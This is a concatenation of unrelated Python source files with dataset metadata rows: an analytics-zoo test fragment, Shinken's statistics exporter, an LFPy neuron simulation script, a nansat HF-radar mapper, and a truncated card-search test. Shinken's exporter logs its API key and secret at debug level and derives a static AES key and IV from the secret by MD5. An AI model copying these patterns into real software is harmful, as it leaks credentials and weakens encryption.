        assert_almost_equal(MSE(y_true, y_pred, multioutput='uniform_average'),
                            [1], decimal=2)
        assert_almost_equal(MAPE(y_true, y_pred, multioutput='uniform_average'),
                            [100], decimal=2)
        assert_almost_equal(MAE(y_true, y_pred, multioutput='uniform_average'),
                            [1], decimal=2)
| intel-analytics/analytics-zoo | pyzoo/test/zoo/orca/automl/test_metrics.py | Python | apache-2.0 | 8,596 | [
"ORCA"
] | 62014fbb78143cf55e729bb05115fa502dfcf3ddf97c35d1ceb03ea79ff0ed19 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2014:
# Gabes Jean, naparuba@gmail.com
# Gerhard Lausser, Gerhard.Lausser@consol.de
# Gregory Starck, g.starck@gmail.com
# Hartmut Goebel, h.goebel@goebel-consult.de
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
import threading
import time
import json
import hashlib
import base64
import socket
# For old users python-crypto was not mandatory, don't break their setup
try:
from Crypto.Cipher import AES
except ImportError:
AES = None
from shinken.log import logger
from shinken.http_client import HTTPClient, HTTPException
BLOCK_SIZE = 16  # AES block size in bytes; padding always rounds up to a multiple of this


def pad(data):
    """Pad *data* to a multiple of BLOCK_SIZE.

    PKCS#7-style: the pad character is chr(n) where n is the number of
    characters appended; a full block of padding is added when *data* is
    already block-aligned.
    """
    fill = BLOCK_SIZE - len(data) % BLOCK_SIZE
    return data + fill * chr(fill)
def unpad(padded):
    """Strip the PKCS#7-style padding added by ``pad()``.

    The last character encodes how many characters to remove.
    """
    n = ord(padded[-1])
    return padded[:-n]
class Stats(object):
    """Per-daemon statistics collector and exporter.

    Aggregates (min, max, count, sum) per stat key via :meth:`incr` and
    exports in two non-exclusive modes:

    * kernel mode: a background "reaper" thread posts an (optionally
      AES-encrypted) JSON payload to kernel.shinken.io once a minute;
    * statsd mode: each :meth:`incr` also fires a UDP statsd packet.

    NOTE: this class uses Python 2 syntax (``except Exc, e`` and
    ``dict.iteritems``); it is not importable under Python 3 as-is.
    """
    def __init__(self):
        # Identity of the daemon these stats belong to; filled by register().
        self.name = ''
        self.type = ''
        self.app = None
        # stat key -> (min, max, count, sum)
        self.stats = {}
        # There are two modes that are not exclusive
        # first the kernel mode
        self.api_key = ''
        self.secret = ''
        self.http_proxy = ''
        self.con = HTTPClient(uri='http://kernel.shinken.io')
        # then the statsd one
        self.statsd_sock = None
        self.statsd_addr = None

    def launch_reaper_thread(self):
        """Start the daemonized background thread that exports stats every minute."""
        self.reaper_thread = threading.Thread(None, target=self.reaper, name='stats-reaper')
        self.reaper_thread.daemon = True
        self.reaper_thread.start()

    def register(self, app, name, _type, api_key='', secret='', http_proxy='', statsd_host='localhost', statsd_port=8125, statsd_prefix='shinken', statsd_enabled=False):
        """Configure the collector for a daemon.

        ``app`` is the daemon object (must provide get_stats_struct()),
        ``name``/``_type`` identify it in exported metric names. The kernel
        mode needs ``api_key``/``secret``; statsd is only activated when
        ``statsd_enabled`` is True.
        """
        self.app = app
        self.name = name
        self.type = _type
        # kernel.io part
        self.api_key = api_key
        self.secret = secret
        self.http_proxy = http_proxy
        # local statsd part
        self.statsd_host = statsd_host
        self.statsd_port = statsd_port
        self.statsd_prefix = statsd_prefix
        self.statsd_enabled = statsd_enabled
        if self.statsd_enabled:
            logger.debug('Loading statsd communication with %s:%s.%s', self.statsd_host, self.statsd_port, self.statsd_prefix)
            self.load_statsd()
        # Also load the proxy if need
        self.con.set_proxy(self.http_proxy)

    # Let be crystal clear about why I don't use the statsd lib in python: it's crappy.
    # how guys did you fuck this up to this point? django by default for the conf?? really?...
    # So raw socket are far better here
    def load_statsd(self):
        """Resolve the statsd host and open the UDP socket; failures are logged, not raised."""
        try:
            self.statsd_addr = (socket.gethostbyname(self.statsd_host), self.statsd_port)
            self.statsd_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        except (socket.error, socket.gaierror), exp:
            logger.error('Cannot create statsd socket: %s' % exp)
            return

    # Will increment a stat key, if None, start at 0
    def incr(self, k, v):
        """Fold value ``v`` (seconds) into the (min, max, count, sum) entry for key ``k``
        and, when statsd is configured, emit a timing packet in milliseconds."""
        _min, _max, nb, _sum = self.stats.get(k, (None, None, 0, 0))
        nb += 1
        _sum += v
        if _min is None or v < _min:
            _min = v
        if _max is None or v > _max:
            _max = v
        self.stats[k] = (_min, _max, nb, _sum)

        # Manage local statd part
        if self.statsd_sock and self.name:
            # beware, we are sending ms here, v is in s
            packet = '%s.%s.%s: %d|ms' % (self.statsd_prefix, self.name, k, v*1000)
            try:
                self.statsd_sock.sendto(packet, self.statsd_addr)
            except (socket.error, socket.gaierror), exp:
                pass # cannot send? ok not a huge problem here and cannot
                     # log because it will be far too verbose :p

    def _encrypt(self, data):
        """AES-CBC encrypt ``data`` and return it urlsafe-base64 encoded.

        Key and IV are both derived from MD5 digests of the shared secret,
        so payloads are only as strong as that secret. ``data`` must be
        padded to the AES block size (done here via pad()).
        """
        m = hashlib.md5()
        m.update(self.secret)
        key = m.hexdigest()
        m = hashlib.md5()
        m.update(self.secret + key)
        iv = m.hexdigest()
        data = pad(data)
        aes = AES.new(key, AES.MODE_CBC, iv[:16])
        encrypted = aes.encrypt(data)
        return base64.urlsafe_b64encode(encrypted)

    def reaper(self):
        """Background loop: once a minute, swap out the accumulated stats,
        turn them into avg/min/max/count graphite-style lines and PUT the
        daemon's whole stats structure to kernel.shinken.io (encrypted when
        possible). Runs forever; meant for a daemon thread."""
        while True:
            now = int(time.time())
            stats = self.stats
            self.stats = {}
            if len(stats) != 0:
                s = ', '.join(['%s:%s' % (k,v) for (k,v) in stats.iteritems()])
                # NOTE(review): this summary string is never used before `s`
                # is overwritten in the loop below.
            # If we are not in an initializer daemon we skip, we cannot have a real name, it sucks
            # to find the data after this
            if not self.name or not self.api_key or not self.secret:
                time.sleep(60)
                continue
            metrics = []
            for (k,e) in stats.iteritems():
                nk = '%s.%s.%s' % (self.type, self.name, k)
                _min, _max, nb, _sum = e
                _avg = float(_sum) / nb
                # nb can't be 0 here and _min_max can't be None too
                s = '%s.avg %f %d' % (nk, _avg, now)
                metrics.append(s)
                s = '%s.min %f %d' % (nk, _min, now)
                metrics.append(s)
                s = '%s.max %f %d' % (nk, _max, now)
                metrics.append(s)
                s = '%s.count %f %d' % (nk, nb, now)
                metrics.append(s)
            #logger.debug('REAPER metrics to send %s (%d)' % (metrics, len(str(metrics))) )
            # get the inner data for the daemon
            struct = self.app.get_stats_struct()
            struct['metrics'].extend(metrics)
            #logger.debug('REAPER whole struct %s' % struct)
            j = json.dumps(struct)
            if AES is not None and self.secret != '':
                logger.debug('Stats PUT to kernel.shinken.io/api/v1/put/ with %s %s' % (self.api_key, self.secret))
                # the payload is padded to a multiple of 16 inside _encrypt()
                encrypted_text = self._encrypt(j)
                try:
                    r = self.con.put('/api/v1/put/?api_key=%s' % (self.api_key), encrypted_text)
                except HTTPException, exp:
                    logger.debug('Stats REAPER cannot put to the metric server %s' % exp)
            time.sleep(60)
statsmgr = Stats()
| kaji-project/shinken | shinken/stats.py | Python | agpl-3.0 | 6,828 | [
"CRYSTAL"
] | 44946b6544d084fd514b1582dfcdd1dc6a989bd853a43ecd92e42a10d7f79305 |
import LFPy
import numpy as np
import matplotlib.pylab as pl
import sys
import os
import random as random
# Set a fixed random seed to get the same result on every run
np.random.seed(1988)
# What this program needs for running:
# where the input data is (and where output will be written)
f2 = open('cellname', 'r')
celln = [line.strip() for line in f2]
cellname = celln[0]
f2.close()
# All subsequent relative paths resolve inside the cell's directory
os.chdir(cellname)
# Inputs read below: morphology, active-channel file, electrode
# coordinates and tissue conductivity (sigma)
#morphology
f3 = open('morphology.txt', 'r')
morph = [line.strip() for line in f3]
morpho = morph[0]
f3.close()
#active channel description
f4 = open('active.txt', 'r')
actw = [line.strip() for line in f4]
activewhere = actw[0]
f4.close()
#electrode coordinates
felec = open('elcoord_x_y_z', 'r')
elec = [line.strip() for line in felec]
felec.close()
elc=np.hstack((elec))
# Reshape to 3 rows: x, y, z coordinates of the extracellular contacts
elcor=elc.reshape(3,-1)
#tissue properties: extracellular conductivity is the second line of 'elprop'
f1 = open('elprop', 'r')
elp = [line.strip() for line in f1]
sigma =float(elp[1])
f1.close()
######################x
#synaptic inputs
def stationary_poisson(nsyn, lambd, tstart, tstop):
    """Generate ``nsyn`` stationary Poisson spike trains.

    Parameters
    ----------
    nsyn : int
        Number of independent spike trains to draw.
    lambd : float
        Mean rate of each process in Hz.
    tstart, tstop : float
        Start/stop of the interval, in milliseconds.

    Returns
    -------
    list of numpy.ndarray
        One sorted array of spike times (ms, uniform within the interval)
        per train; trains that draw zero spikes yield an empty array.
    """
    interval_s = (tstop - tstart) * .001  # interval length in seconds
    spiketimes = []
    # `range` instead of the Python-2-only `xrange`: identical behaviour
    # under Python 2, and keeps the script runnable under Python 3.
    for _ in range(nsyn):
        spikecount = np.random.poisson(interval_s * lambd)
        if spikecount == 0:
            spiketimes.append(np.empty(0))
        else:
            spikevec = tstart + (tstop - tstart) * np.random.random(spikecount)
            spiketimes.append(np.sort(spikevec))  # sort them too!
    return spiketimes
###############
# Cell parameters: passive membrane plus whatever active mechanisms the
# custom code file (read above) inserts.
cell_parameters = {
    'morphology' : morpho ,
    'Ra': 123,
    'tstartms' : 0.,        # start time of simulation, recorders start at t=0
    'tstopms' : 850.,       # stop simulation at 850 ms
    'passive' : True,
    'v_init' : -65,         # initial crossmembrane potential
    'e_pas' : -65,          # reversal potential passive mechs
    'nsegs_method' : 'fixed_length',
    'max_nsegs_length':10,
    # 'lambda_f' : 1000,    # segments are isopotential at this frequency
    'custom_code' : [activewhere], # will run this file
}
# Electrode contact coordinates (one row each from the file read above)
x=elcor[0,]
x= x.astype('Float64')
y=elcor[1,]
y= y.astype('Float64')
z=elcor[2,]
z= z.astype('Float64')
# y = pl.zeros(X.size)
# Parameters for the extracellular recording electrode
electrodeParameters = {
    'sigma' : sigma,    # extracellular conductivity
    'x' : x,            # x,y,z-coordinates of contact points
    'y' : y,
    'z' : z,
    # 'method' : 'som_as_point', # treat soma segment as sphere source
    # 'method' : 'pointsource'
    'method' : 'linesource'
}
#pointprocess= {
#    'idx' : 1,
#    'record_current' : True,
#    'pptype' : 'IClamp',
#    'amp' : 0.05,
#    #'amp' : 0.2,
#    'dur' : 30,
#    'delay' : 15
#    }
## create extracellular electrode object
electrode = LFPy.RecExtElectrode(**electrodeParameters)
simulationParameters = {
    'electrode' : electrode,
    'rec_imem' : True,  # record membrane currents during simulation
    'rec_isyn' : True,  # record synaptic currents
}
# Initialize cell instance, using the LFPy.Cell class
cell = LFPy.Cell(**cell_parameters)
# rotating the cell (currently disabled)
#rotation = {'x' : np.pi/2, 'y' : 0, 'z' : 0}
#cell.set_rotation(**rotation)
# Anchor the cell at the first 3D point of the morphology instead of the
# default origin placement.
# NOTE(review): this affects electrode geometry and plotting setups —
# confirm this offset is intended.
cell.set_pos(xpos = LFPy.cell.neuron.h.x3d(0) , ypos = LFPy.cell.neuron.h.y3d(0) , zpos = LFPy.cell.neuron.h.z3d(0))
#cell.set_pos(xpos = xpontok[1], ypos = ypontok[1], zpos = zpontok[1])
# Synaptic inputs
# Three hand-placed synapse parameter sets; their LFPy.Synapse creation
# further below is commented out, so they are currently unused.
synapse_parameters = {
    'idx' : cell.get_closest_idx(x=100., y=0., z=500.), #100 0.00 500
    'e' : 0.,               # reversal potential
    'syntype' : 'ExpSyn',   # synapse type
    #'tau' : 10.,           # syn. time constant
    'tau' : 2.,
    # 'weight' : .001,      # syn. weight
    'weight' : .04,         # syn. weight
    'record_current' : True,
}
synapse_parameters2 = {
    'idx' : cell.get_closest_idx(x=-100., y=0., z=400.), #100 0.00 500
    'e' : 0.,               # reversal potential
    'syntype' : 'ExpSyn',   # synapse type
    #'tau' : 10.,           # syn. time constant
    'tau' : 2.,
    # 'weight' : .001,      # syn. weight
    'weight' : .03,         # syn. weight
    'record_current' : True,
}
synapse_parameters3 = {
    'idx' : cell.get_closest_idx(x=40., y=0., z=200.), #100 0.00 500
    'e' : 0.,               # reversal potential
    'syntype' : 'ExpSyn',   # synapse type
    #'tau' : 10.,           # syn. time constant
    'tau' : 2.,
    # 'weight' : .001,      # syn. weight
    'weight' : .04,         # syn. weight
    'record_current' : True,
}
############################################x
# Parameters for the randomly distributed synapse population actually used
synapse_parameters_random = {
    'idx' : 0,              # to be set later
    'e' : 0.,               # reversal potential
    'syntype' : 'ExpSyn',   # synapse type
    'tau' : 2.,             # syn. time constant
    'weight' : .01,         # syn. weight
    'record_current' : True,
}
# synaptic spike times: a pool of presynaptic Poisson trains
n_pre_syn = 1000
pre_syn_sptimes = stationary_poisson(nsyn=n_pre_syn, lambd=2, tstart=0, tstop=400)#70)
# assign spike times to different units
n_synapses = 1000
# Place each synapse on a random segment (area-weighted) and attach one of
# the presynaptic spike trains, chosen by the random permutation below.
pre_syn_pick = np.random.permutation(np.arange(n_pre_syn))[0:n_synapses]
for i_syn in xrange(n_synapses):
    syn_idx = int(cell.get_rand_idx_area_norm())
    synapse_parameters_random.update({'idx' : syn_idx})
    synapse = LFPy.Synapse(cell, **synapse_parameters_random)
    synapse.set_spike_times(pre_syn_sptimes[pre_syn_pick[i_syn]])
##############################################################
# Create synapse and set time of synaptic input (disabled alternatives)
#synapse = LFPy.Synapse(cell, **synapse_parameters)
#synapse2 = LFPy.Synapse(cell, **synapse_parameters2)
#synapse3 = LFPy.Synapse(cell, **synapse_parameters3)
#insert_synapses(synapse_parameters_2, **insert_synapses_2)
#synapse.set_spike_times(np.array([5.,25., 44.]))
#synapse2.set_spike_times(np.array([15.,20., 40.]))
#synapse3.set_spike_times(np.array([10.,33.]))
# Sinusoidal (6.5 Hz) current injection at the soma, built from 850
# consecutive 1-ms IClamp steps sampling 3.6*sin(2*pi*6.5*t/1000).
TimesStim= np.arange(850)
for istim in xrange(850):
    pointprocess= {
        'idx' : 0,
        # 'record_current' : True,
        'pptype' : 'IClamp',
        'amp' : np.array(3.6*np.sin(2.*3.141*6.5*TimesStim/1000.))[istim], #3.6
        # #'amp' : 0.2,
        'dur' : 1.,
        'delay' : istim,
    }
    stimulus = LFPy.StimIntElectrode(cell, **pointprocess)
#stimulus = LFPy.StimIntElectrode(cell, **pointprocess)
# Perform NEURON simulation; results saved as attributes in the cell instance
cell.simulate(**simulationParameters)
# Save simulation outputs as plain-text files in the cell's directory
#np.savetxt( 'Istim',stimulus.i)
np.savetxt( 'membcurr',cell.imem)
np.savetxt( 'myLFP', electrode.LFP)
np.savetxt( 'somav.txt', cell.somav)
# midpoint coordinates of each segment
coords = np.hstack(
    (cell.xmid, cell.ymid, cell.zmid)
)
np.savetxt( 'coordsmid_x_y_z',coords)
# coordinates of the segment's beginning
coordsstart = np.hstack(
    (cell.xstart, cell.ystart, cell.zstart)
)
np.savetxt( 'coordsstart_x_y_z',coordsstart)
# coordinates of the segment's end
coordsend = np.hstack(
    (cell.xend, cell.yend, cell.zend)
)
np.savetxt( 'coordsend_x_y_z',coordsend)
# diameter of the segments
segdiam = np.hstack(
    (cell.diam)
)
np.savetxt( 'segdiam_x_y_z',segdiam)
##########x
#elec = np.hstack(
#    (electrode.x, electrode.y, electrode.z)
#)
#np.savetxt(outname,' + 'elcoord_x_y_z',elec)
# length of segments
np.savetxt( 'seglength',cell.length)
# time vector of the simulation
np.savetxt( 'time',cell.tvec)
# record which presynaptic trains fed the synapses in this run
np.savetxt( 'synapse_locations',pre_syn_pick)
#elprop=np.hstack((d,electrode.sigma))
#np.savetxt( 'elprop',electrode.sigma)
# Plotting of simulation results:
################################x
#LFPy.cell.neuron.h...
#h = LFPy.cell.neuron.h
#hossz=len(cell.allsecnames)
#f4 = open(outname,' + '/segcoords/branchnum', 'w')
#f4.write(str(hossz))
#f4.close()
#b=0
#for x in cell.allseclist:
# b=b+1
# xc=list()
# yc=list()
# zc=list()
# for i in range(int(h.n3d())):
# #print h.x3d(i)
# xc.append(h.x3d(i))
# yc.append(h.y3d(i))
# zc.append(h.z3d(i))
# np.savetxt(outname,' + '/segcoords/segcord'+str(b),np.hstack((xc,yc,zc)))
| csdori/skCSD | simulation/LFP_calc_sine.py | Python | bsd-3-clause | 8,494 | [
"NEURON"
] | 783422a9033b7d86f08649752917bc22e34b396826c7461561c9493fe3fbd626 |
# Name: mapper_metno_hfr
# Purpose: Mapper for CODAR SeaSonde High-Frequency radar data provided by MET Norway
# For data see: https://thredds.met.no/thredds/catalog/remotesensinghfradar/catalog.html
# Authors: Artem Moiseev
# Licence: This file is part of NANSAT. You can redistribute it or modify
# under the terms of GNU General Public License, v.3
# http://www.gnu.org/licenses/gpl-3.0.html
import os
from datetime import datetime, timedelta
import json
from netCDF4 import Dataset, num2date
import numpy as np
from osgeo import gdal, osr
import pythesint as pti
from scipy.interpolate import griddata
from nansat.vrt import VRT
from nansat.exceptions import WrongMapperError
class Mapper(VRT):
    """Nansat mapper for CODAR SeaSonde HF-radar NetCDF files from MET Norway.

    Accepts files from the TORU, FRUH and BERL sites (recognized by filename
    prefix), regrids each supported variable onto a regular UTM grid with
    nearest-neighbour interpolation, and exposes them as bands.
    """
    # 3D (time, y, x) variables exposed as raster bands.
    BAND_NAMES = ['direction', 'ersc', 'ertc', 'espc', 'etmp', 'maxv',
                  'minv', 'sprc', 'u', 'v', 'velo', 'vflg', 'xdst', 'ydst']
    # Filename prefixes of the supported radar sites.
    SUPPORTED_LOCATIONS = ['RDLm_TORU', 'RDLm_FRUH', 'RDLm_BERL']

    def __init__(self, filename, gdal_dataset, gdal_metadata, GCP_COUNT=10, timestamp=None, **kwargs):
        """Build the VRT for one hourly time slice of the radar file.

        Raises WrongMapperError for files that are not from a supported site.
        ``timestamp`` selects the time slice; defaults to midnight of the
        date encoded in the filename.
        """
        filename_name = os.path.split(filename)[-1].split('.')[0]
        # Check if this file belongs to one of the supported sites
        correct_mapper = False
        for location in self.SUPPORTED_LOCATIONS:
            # If it matches one of the locations break the loop and flag True
            if filename_name.startswith(location):
                correct_mapper = True
                break
        if not correct_mapper:
            raise WrongMapperError
        # Import NetCDF4 dataset
        nc_dataset = Dataset(filename)
        # Define projection and target pixel size (depending on the HFR site)
        if nc_dataset.getncattr('site') == 'TORU':
            proj4 = '+proj=utm +zone=32 +ellps=WGS84 +datum=WGS84 +units=m +no_defs'
            GRID_PX_SIZE = 1500 # Final raster px size in meters
        elif nc_dataset.getncattr('site') == 'FRUH':
            proj4 = '+proj=utm +zone=34 +ellps=WGS84 +datum=WGS84 +units=m +no_defs'
            GRID_PX_SIZE = 5000 # Final raster px size in meters
        elif nc_dataset.getncattr('site') == 'BERL':
            proj4 = '+proj=utm +zone=35 +ellps=WGS84 +datum=WGS84 +units=m +no_defs'
            GRID_PX_SIZE = 5000 # Final raster px size in meters
        else:
            raise WrongMapperError
        srs = osr.SpatialReference()
        srs.ImportFromProj4(proj4)
        projection = srs.ExportToWkt()
        # Get regular x grid and y grid covering the data extent
        x_grd, y_grd = self.create_linear_grid(nc_dataset['x'][:], nc_dataset['y'][:], GRID_PX_SIZE)
        # NOTE(review): x_grd.shape is (n_rows, n_cols) i.e. (len(y-steps),
        # len(x-steps)) — confirm that this x/y ordering is what
        # _init_from_dataset_params expects.
        raster_x_size, raster_y_size = x_grd.shape
        # Define geotransform (north-up, square pixels of GRID_PX_SIZE meters)
        geotransform = (x_grd.min(), GRID_PX_SIZE, 0.0, y_grd.max(), 0.0, GRID_PX_SIZE * -1)
        # Define x and y size
        self._init_from_dataset_params(raster_x_size, raster_y_size, geotransform, projection)
        # If required timestamp was not specified then extract date from filename and use first time
        if timestamp is None:
            timestamp = self.date_from_filename(filename)
        # Convert time info from the dataset to datetime
        timestamps = num2date(nc_dataset['time'][:].data, nc_dataset['time'].units)
        # find band id for the required timestamp
        # Note: add 1 because GDAL band counting starts from 1 not from 0
        src_timestamp_id = np.where(timestamps == timestamp)[0][0] + 1
        # Iterate through all subdatasets and add the supported bands
        for subdataset in gdal_dataset.GetSubDatasets():
            # Get name of subdataset
            subdataset_name = subdataset[0].split(':')[2]
            # Check if the subdataset is in the accepted 3D vars list
            if subdataset_name not in self.BAND_NAMES:
                continue
            gdal_subdataset = gdal.Open(subdataset[0])
            # need to be float for the nan replacement
            band_data = gdal_subdataset.GetRasterBand(int(src_timestamp_id)).ReadAsArray().astype('float')
            # remove fill value (replace with nan)
            fill_value = int(gdal_subdataset.GetMetadata_Dict()['#'.join([subdataset_name, '_FillValue'])])
            band_data[band_data == fill_value] = np.nan
            # Interpolate data onto the regular grid
            band_grid_data = self.band2grid((nc_dataset['x'][:], nc_dataset['y'][:]),
                                            band_data, (x_grd, y_grd))
            # Create VRT for the regridded data
            band_vrt = VRT.from_array(band_grid_data)
            # Add VRT to the list of all dataset vrts (kept alive on self)
            self.band_vrts[subdataset_name + 'VRT'] = band_vrt
            # Add band to the dataset
            src = {'SourceFilename': self.band_vrts[subdataset_name + 'VRT'].filename,
                   'SourceBand': 1}
            # Add band specific metadata (copied from the NetCDF variable attrs)
            dst = {'name': subdataset_name}
            for key in gdal_subdataset.GetMetadata_Dict().keys():
                if key.startswith(subdataset_name):
                    clean_metadata_name = key.split('#')[1]
                    dst[clean_metadata_name] = gdal_subdataset.GetMetadata_Dict()[key]
            # Create band
            self.create_band(src, dst)
        self.dataset.FlushCache()
        # Set GCMD metadata
        self.dataset.SetMetadataItem('instrument', json.dumps(pti.get_gcmd_instrument('SCR-HF')))
        self.dataset.SetMetadataItem('platform', json.dumps(pti.get_gcmd_platform('CODAR SeaSonde')))
        self.dataset.SetMetadataItem('Data Center', json.dumps(pti.get_gcmd_provider('NO/MET')))
        self.dataset.SetMetadataItem('Entry Title', 'Near-Real Time Surface Ocean Radial Velocity')
        self.dataset.SetMetadataItem('gcmd_location',json.dumps(pti.get_gcmd_location('NORTH SEA')))
        # Set time coverage metadata (one-hour slice starting at `timestamp`)
        self.dataset.SetMetadataItem('time_coverage_start', timestamp.isoformat())
        self.dataset.SetMetadataItem('time_coverage_end',
                                     (timestamp + timedelta(minutes=59, seconds=59)).isoformat())
        # Copy NetCDF global attributes into the dataset metadata
        for key, value in gdal_dataset.GetMetadata_Dict().items():
            self.dataset.SetMetadataItem(key.split('#')[1], value)

    def date_from_filename(self, src):
        """Return midnight of the date encoded in the last three underscore-separated
        filename fields (..._YYYY_MM_DD)."""
        filename = os.path.splitext(os.path.basename(src))[0]
        year, month, day = filename.split('_')[-3:]
        src_timestamp = datetime(int(year), int(month), int(day), 0, 0, 0)
        return src_timestamp

    def create_linear_grid(self, x, y, px_size):
        """Create a regular meshgrid spanning the x/y extent with `px_size` spacing
        (y descends from max to min so the grid is north-up)."""
        x_grd, y_grd = np.meshgrid(np.arange(x.min(), x.max(), px_size),
                                   np.arange(y.max(), y.min(), px_size * -1))
        return x_grd, y_grd

    def band2grid(self, src_grd, var, dst_grd):
        """Nearest-neighbour resample `var` from the source (x, y) grid onto `dst_grd`."""
        # Points [(x, y), ... , ] from original file
        points = list(zip(src_grd[0].flatten(), src_grd[1].flatten()))
        repr_var = griddata(points, var.flatten(), (dst_grd[0], dst_grd[1]), method='nearest')
        return repr_var
| nansencenter/nansat | nansat/mappers/mapper_metno_hfr.py | Python | gpl-3.0 | 6,968 | [
"NetCDF"
] | a08bf80b8aab9b70eecbc05e74b89b9f962ca468ea00934329b80993e647baba |
from typing import List
import pytest
from find import search
from find.search import InvalidValueException
from magic import seasons
from magic.database import db
# Some of these tests only work hooked up to a cards db, and are thus marked functional. They are fast, though, and you should run them if editing card search.
# $ python3 dev.py test find
def test_match() -> None:
    """Tokenizer sanity: valid key/criterion tokens match, malformed ones do not."""
    assert search.Key.match('c')
    assert search.Key.match('mana')
    assert not search.Key.match('z')
    assert not search.Key.match('')
    assert not search.Key.match(' ')
    assert not search.Criterion.match('magic:2uu')
    assert search.Criterion.match('tou>2')
# START Tests from https://scryfall.com/docs/syntax
@pytest.mark.functional
def test_colors_and_color_identity() -> None:
    """Color (c:) and color identity (id:) filters, including comparison
    operators, case-insensitivity, multicolor (m) and colorless (c)."""
    s = 'c:rg'
    do_functional_test(s, ['Animar, Soul of Elements', 'Boggart Ram-Gang', 'Progenitus'], ['About Face', 'Cinder Glade', 'Lupine Prototype', 'Sylvan Library'])
    s = 'color>=uw -c:red'
    do_functional_test(s, ['Absorb', 'Arcades Sabboth', 'Bant Sureblade', 'Worldpurge'], ['Brainstorm', 'Mantis Rider', 'Karn Liberated'])
    s = 'id<=esper t:instant'
    do_functional_test(s, ['Abeyance', 'Abjure', 'Absorb', 'Ad Nauseam', 'Batwing Brume', 'Warping Wail'], ['Act of Aggression', 'Inside Out', 'Jilt'])
    # Same query uppercased must behave identically.
    s = 'id<=ESPER t:instant'
    do_functional_test(s, ['Abeyance', 'Abjure', 'Absorb', 'Ad Nauseam', 'Batwing Brume', 'Warping Wail'], ['Act of Aggression', 'Inside Out', 'Jilt'])
    s = 'c:m'
    do_functional_test(s, ['Bant Charm', 'Murderous Redcap'], ['Izzet Signet', 'Lightning Bolt', 'Spectral Procession'])
    s = 'c=br'
    do_functional_test(s, ['Murderous Redcap', 'Terminate'], ['Cruel Ultimatum', 'Fires of Undeath', 'Hymn to Tourach', 'Lightning Bolt', 'Rakdos Signet'])
    s = 'id:c t:land'
    do_functional_test(s, ['Ancient Tomb', 'Wastes'], ['Academy Ruins', 'Island', 'Nihil Spellbomb'])
    s = 'c:colorless'
    do_functional_test(s, ['Plains', "Tormod's Crypt"], ['Master of Etherium'])
# "the four-color nicknames chaos, aggression, altruism, growth, artifice are supported"
@pytest.mark.functional
def test_types() -> None:
    """Type-line filters (t:), combined and negated."""
    s = 't:merfolk t:legend'
    do_functional_test(s, ['Emry, Lurker of the Loch', 'Sygg, River Cutthroat'], ['Hullbreacher', 'Ragavan, Nimble Pilferer'])
    s = 't:goblin -t:creature'
    do_functional_test(s, ['Tarfire', 'Warren Weirding'], ['Goblin Bombardment', 'Lightning Bolt', 'Skirk Prospector'])
@pytest.mark.functional
def test_card_text() -> None:
    """Oracle text filters (o:), bare words and quoted phrases with ~ for the card name."""
    s = 'o:draw o:creature'
    do_functional_test(s, ['Edric, Spymaster of Trest', 'Grim Backwoods', 'Mystic Remora'], ['Ancestral Recall', 'Honor of the Pure'])
    s = 'o:"~ enters the battlefield tapped"'
    do_functional_test(s, ['Arcane Sanctum', 'Diregraf Ghoul', 'Golgari Guildgate'], ['Tarmogoyf'])
@pytest.mark.functional
def test_mana_costs() -> None:
    """Mana cost (mana:/m:) and cmc filters; unsupported syntaxes are kept
    commented out with links to their tracking issues."""
    s = 'mana:{G}{U}'
    do_functional_test(s, ['Omnath, Locus of Creation', 'Ice-Fang Coatl'], ['Breeding Pool', 'Slippery Bogle'])
    # https://github.com/PennyDreadfulMTG/Penny-Dreadful-Tools/issues/8969
    # s = 'm:2WW'
    # do_functional_test(s, ["Emeria's Call", 'Solitude'], ['Karoo', 'Spectral Procession'])
    # s = 'm>3WU'
    # do_functional_test(s, ['Drogskol Reaver', 'Sphinx of the Steel Wind'], ['Angel of the Dire Hour', 'Fractured Identity'])
    s = 'm:{R/P}'
    do_functional_test(s, ['Gut Shot', 'Slash Panther'], ['Dismember', 'Lightning Bolt'])
    s = 'c:u cmc=5'
    do_functional_test(s, ['Force of Will', 'Fractured Identity'], ['Goldspan Dragon', 'Omnath, Locus of Creation'])
    # https://github.com/PennyDreadfulMTG/Penny-Dreadful-Tools/issues/8968
    # s = 'devotion:{u/b}{u/b}{u/b}'
    # do_functional_test(s, ['Ashemnoor Gouger', 'Niv-Mizzet Parun', 'Omniscience', 'Phrexian Obliterator', 'Progenitus'], ['Cunning Nightbonger', 'Watery Grave'])
    # https://github.com/PennyDreadfulMTG/Penny-Dreadful-Tools/issues/8618
    # s = 'produces=wu'
    # do_functional_test(s, ['Azorius Signet', 'Celestial Colonnade'], ['Birds of Paradise', 'Teferi, Time Raveler'])
@pytest.mark.functional
def test_power_toughness_and_loyalty() -> None:
    """Power (pow), toughness (tou) and loyalty (loy) comparisons."""
    s = 'pow>=8'
    do_functional_test(s, ["Death's Shadow", 'Dragonlord Atarka', 'Emrakul, the Aeons Torn'], ['Mortivore', 'Swamp', 'Tarmogoyf', 'Wild Nacatl'])
    # https://github.com/PennyDreadfulMTG/Penny-Dreadful-Tools/issues/8970
    # s = 'pow>tou c:w t:creature'
    # do_functional_test(s, ["Kataki, War's Wage", 'Knight of Autumn'], ['Bonecrusher Giant', 'Hullbreacher', 'Swamp'])
    s = 't:planeswalker loy=3'
    do_functional_test(s, ['Jace, the Mind Sculptor', 'Liliana of the Veil'], ['Karn, the Great Creator', 'Mountain', 'Progenitus'])
@pytest.mark.functional
def test_multi_faced_cards() -> None:
    """Layout filters for multi-faced cards (is:meld, is:split)."""
    s = 'is:meld'
    do_functional_test(s, ['Hanweir Battlements', 'Hanweir Garrison'], ['Hanweir, the Writhing Township'])
    s = 'is:split'
    do_functional_test(s, ['Driven // Despair', 'Fire // Ice', 'Wear // Tear'], ['Budoka Gardener', 'Hanweir Garrison'])
@pytest.mark.functional
def test_spells_permanents_and_effects() -> None:
    """is:spell / is:permanent / is:vanilla classification filters."""
    s = 'c>=br is:spell f:duel'
